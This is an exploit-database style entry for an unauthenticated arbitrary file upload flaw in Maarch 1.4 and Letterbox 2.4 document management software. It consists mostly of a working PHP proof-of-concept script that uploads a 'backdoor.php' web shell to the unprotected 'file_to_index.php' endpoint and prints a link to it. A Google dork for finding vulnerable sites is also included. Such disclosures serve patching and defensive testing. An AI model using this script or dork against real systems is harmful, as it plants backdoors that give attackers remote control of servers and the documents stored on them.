MAARCH 1.4 - Arbitrary File Upload

2014-10-29 21:05:06

/******************************************************
# Exploit Title: Maarch 1.4 Arbitrary file upload
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/

The file "file_to_index.php" is accessible without any authentication to upload a file.

This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4

Exploit code :

<?php

/* EXPLOIT URL */
$target_url= "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";

/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);

function do_post_request($url, $res, $file, $name)
{
$data = "";
$boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
$data .= "--$boundary\n";
$fileContents = file_get_contents($file);
$md5 = md5_file($file);
$ext = pathinfo($file, PATHINFO_EXTENSION);
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
$data .= "Content-Type: text/plain\n";
$data .= "Content-Transfer-Encoding: binary\n\n";
$data .= $fileContents."\n";
$data .= "--$boundary--\n";
$params = array('http' => array(
'method' => 'POST',
'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
'content' => $data
));

$ctx = stream_context_create($params);
$fp = fopen($url, 'rb', false, $ctx);
if (!$fp)
{
throw new Exception("Erreur !");
}
$response = @stream_get_contents($fp);
if ($response === false)
{
throw new Exception("Erreur !");
}
else
{
echo "file should be here : ";
/* LETTERBOX */
if(count($response) > 1) echo $response;
/* MAARCH ENTERPRISE | GEC */
else echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";

}
}

?>

Fixes

No fixes

In order to submit a new fix you need to be registered.